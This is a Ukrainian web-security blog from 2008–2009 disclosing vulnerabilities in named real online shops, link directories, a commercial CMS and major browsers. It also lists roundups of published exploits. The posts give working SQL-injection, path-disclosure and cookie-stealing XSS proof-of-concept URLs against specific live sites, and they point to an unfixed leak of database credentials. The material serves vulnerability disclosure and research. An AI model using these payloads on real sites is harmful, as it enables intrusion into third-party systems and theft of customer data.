Websecurity - Веб безпека

21.04.2009

У липні, 24.07.2008, я виявив Full path disclosure, SQL Injection та Information Leakage уразливості на сайті http://tvshop.com.ua (інтернет магазин), що також доступний за адресою http://i-shop.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.cddoma.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.07.2009

Full path disclosure:

http://tvshop.com.ua/itemlist.php?cid=’

http://tvshop.com.ua/item.php

http://tvshop.com.ua/itemlist.php

http://tvshop.com.ua/catalog.php

SQL Injection:

http://tvshop.com.ua/itemlist.php?cid=-1%20or%20version()=4.0

http://tvshop.com.ua/catalog.php?cid=-1%20union%20select%201,version(),1,1,1/*

MySQL 4.0.27-standard-log

Зазначу, що в таблиці клієнтів магазину в БД торік, 24.07.2008, було 17197 записів. А сьогодні, майже через рік, 18112 записів. Тобто майже за рік у магазина збільшилося число клієнтів на 915. А хтось тут про кризис росказує .

Information Leakage:

http://tvshop.com.ua/init.tpl

Витік login, password і name для бази даних та Source Code Disclosure.

Дані уразливості досі не виправлені.

У липні, 18.07.2008, я знайшов Cross-Site Scripting уразливості на сайтах http://www.linkexchanger.ru, http://www.od.com.ua і http://www.lishnih.net. Що використовують веб додаток LinksExchanger, про уразливості в якому я писав нещодавно.

XSS:

POST запит на сторінках linkexchanger.ru/dir/submit.php, od.com.ua/links/submit.php і lishnih.net/catalog/submit.php.
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.

XSS через GET:

http://www.linkexchanger.ru

• alert(document.cookie)
• цікавий

http://www.od.com.ua

• alert(document.cookie)
• цікавий

http://www.lishnih.net

• alert(document.cookie)
• цікавий

Продовжуючи тему експлоітів для Apache, пропоную вам нову добірку експлоітів для цього веб сервера.

Дані експлоіти для уразливостей в Apache Tomcat та Apache mod_dav / svn. Адмінам варто слідкувати за оновленням своїх серверів.

• Apache Tomcat untime.getRuntime().exec() Privilege Escalation (win) (деталі)
• Apache mod_dav / svn Remote Denial of Service Exploit (деталі)

В даній добірці уразливості в веб додатках:

• D-Link DIR-100 long url filter evasion (деталі)
• Turuncu Galeri [galeri_edit.asp] Permission Bypass Vulnerability (деталі)
• Sagem router f@st 2404 remote reset poc (деталі)
• Sagem Router F@ST 2404 Remote Denial Of Service Exploit (деталі)
• RSS-aggregator Multiple vulnerabilities (деталі)
• Wordtrans-web Remote Command Execution Vulnerability (деталі)
• Wordtrans-web Remote Command Execution Vulnerability (деталі)
• PHP Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit (деталі)
• Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC (деталі)
• Xpoz SQL-INJECTION, XSS (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DM Albums і Related Sites. Для котрих з’явилися експлоіти. DM Albums - це плагін для створення фото альбомів та галерей, Related Sites - це плагін для показу лінок на сайти інших користувачів даного плагіна.

• WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln (деталі)
• WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability (деталі)
• WordPress Plugin Related Sites 2.1 Blind SQL Injection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

P.S.

Експлоіт до плагіна Related Sites неробочий, тому що заявлена SQL Injection уразливість відсутня. Тому власники даного плагіна можуть не переживати з приводу цього експлоіта.

В даній добірці уразливості в веб додатках:

• Vulnerabilities in Timbuktu Pro 8.6.5 (деталі)
• Timbuktu Pro Remote Path Traversal and Log Injection (деталі)
• The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities (деталі)
• Multiple vulnerabilities in TietoEnator’s Procapita school administration system, at least version “842 Procapita 840SP1″ (деталі)
• Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability (деталі)
• RSS-aggregator (display) Remote File Inclusion Vulnerability (деталі)
• IdeBox (include) Remote File Inclusion Vulnerability (деталі)
• mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability (деталі)
• NULL pointer in Remotely Anywhere 8.0.668 (деталі)
• WellyBlog Open Source Blog Portal Cross Site Scripting Vulnerabilitiy (деталі)

Учора, 28.06.2009, я виявив Cross-Site Scripting уразливості в різних браузерах, зокрема в Mozilla, Internet Explorer, Opera та Chrome.

21.04.2009 в Firefox 3.0.9 була виправлена уразливість, що дозволяла проводити XSS атаки через заголовок Refresh (дивно, що тількі зараз Мозіла її виправила). І як я перевірив, дана атака також працює в браузерах Mozilla, IE6, Opera та Chrome. Що дозволяє проводити XSS атаки через численні refresh-header редиректори в даних браузерах.

XSS:

При запиті до скрипта на сайті:
http://site/script.php?param=javascript:alert(document.cookie)
Що поверне у відповіді заголовок Refresh:
Refresh: 0; URL=javascript:alert(document.cookie)
Код спрацює в контексті даного сайту.

Уразлива версія Mozilla 1.7.x та попередні версії.

Уразлива версія Mozilla Firefox 3.0.8 та попередні версії.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) та попередні версії. І потенційно наступні версії (IE7 та IE8).

Уразлива версія Opera 9.52 та попередні версії (і потенційно наступні версії).

Уразлива версія Google Chrome 1.0.154.48 та попередні версії (і потенційно наступні версії).

08.04.2009

У липні, 18.07.2008, я виявив Cross-Site Scripting уразливості в LinksExchanger. Це скрипт каталога лінок. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

29.06.2009

XSS:

POST запит на сторінці http://site/links/submit.php
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.

Це persistent XSS - при заході на сторінку submit.php код спрацьовує знову (для поточної сесії).

Уразливі LinksExchanger 2.0 та попередні версії.

У березні, 03.03.2008, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості в CMS SiteLogic (це українська комерційна CMS). Уразливості виявив на сайті http://prp.org.ua. Про наявність уразливостей в їх CMS я неодноразово повідомляв розробникам CMS SiteLogic.

SQL Injection:

http://site/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1

Full path disclosure:

http://site/index.php?mid=’

http://site/includes/stat.php

XSS:

http://site/index.php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.cookie)%3C/script%3E

В даній добірці уразливості в веб додатках:

• HTML Injection in BEA WebLogic Server Console (ASPR #2008-03-11-1) (деталі)
• Session Fixation Vulnerability in WebLogic Administration Console (#2008-03-11-2) (деталі)
• SMF <= 1.1.4 COOKIE[topic] SQL-Injection Exploit (деталі)
• Multiple vulnerabilities in ASG-Sentry 7.0.0 (деталі)
• S21SEC-044-en:OpenDocMan Cross Site Scripting (XSS) (деталі)
• vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index (деталі)
• Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities (деталі)
• eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities (деталі)
• Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities (деталі)
• AspWebCalendar 2008 Remote File Upload Vulnerability (деталі)